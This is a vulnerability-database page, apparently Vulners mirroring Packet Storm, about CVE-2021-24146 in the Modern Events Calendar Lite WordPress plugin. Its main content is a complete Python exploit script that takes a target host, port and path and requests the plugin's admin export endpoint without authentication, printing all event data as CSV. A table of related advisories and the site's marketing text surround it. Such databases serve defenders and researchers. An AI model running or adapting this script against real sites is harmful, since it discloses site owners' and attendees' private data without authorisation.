Vulners
Lucene search
WordPress Modern Events Calendar 5.16.2 Information Disclosure
๐๏ธย 02 Jul 2021ย 00:00:00Reported byย Ron JostTypeย 
ย packetstorm๐ย packetstormsecurity.com๐ย 239ย Views
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Wordpress Modern Events Calendar 5.16.2 Plugin - Event export (Unauthenticated) Exploit | 2 Jul 202100:00 | โ | zdt |
 | CVE-2021-24146 | 18 Mar 202117:32 | โ | circl |
 | Wordpress Modern Events Calendar Lite ่ฎฟ้ฎๆงๅถ้่ฏฏๆผๆด | 18 Mar 202100:00 | โ | cnnvd |
 | CVE-2021-24146 | 18 Mar 202114:57 | โ | cve |
 | CVE-2021-24146 Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export | 18 Mar 202114:57 | โ | cvelist |
 | Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated) | 2 Jul 202100:00 | โ | exploitdb |
 | WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure | 6 Jun 202603:01 | โ | nuclei |
 | CVE-2021-24146 | 18 Mar 202115:15 | โ | nvd |
 | Format string | 18 Mar 202115:15 | โ | prion |
 | PT-2021-15692 ยท WordPress ยท Modern Events Calendar Lite | 18 Mar 202100:00 | โ | ptsecurity |
10
`# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated)
# Date 01.07.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://webnus.net/modern-events-calendar/
# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip
# Version: Before 5.16.5
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-24146
# CWE: CWE-863, CWE-284
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24146/README.md
'''
Description:
Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin,
versions before 5.16.5, did not properly restrict access to the export files,
allowing unauthenticated users to exports all events data in CSV or XML format for example.
'''
'''
Banner:
'''
banner = """
_______ ________ ___ ____ ___ ___ ___ __ __ _____ __ _____
/ ____/ | / / ____/ |__ \ / __ \__ \< / |__ \/ // /< / // / / ___/
/ / | | / / __/________/ // / / /_/ // /_______/ / // /_/ / // /_/ __ \
/ /___ | |/ / /__/_____/ __// /_/ / __// /_____/ __/__ __/ /__ __/ /_/ /
\____/ |___/_____/ /____/\____/____/_/ /____/ /_/ /_/ /_/ \____/
* WordPress Plugin Modern Events Calendar Lite < 5.16.2 - Export Event Data (Unauthenticated)
* @Hacker5preme
"""
print(banner)
'''
Import required modules:
'''
import requests
import argparse
import csv
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events CalendarExport Event Data (Unauthenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
'''
Exploit:
'''
print('')
print('[+] Exported Data: ')
print('')
exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + '/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv'
answer = requests.get(exploit_url)
decoded_content = answer.content.decode('utf-8')
cr = csv.reader(decoded_content.splitlines(), delimiter=',')
my_list = list(cr)
for row in my_list:
print(row)
`
Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Jul 2021 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.76464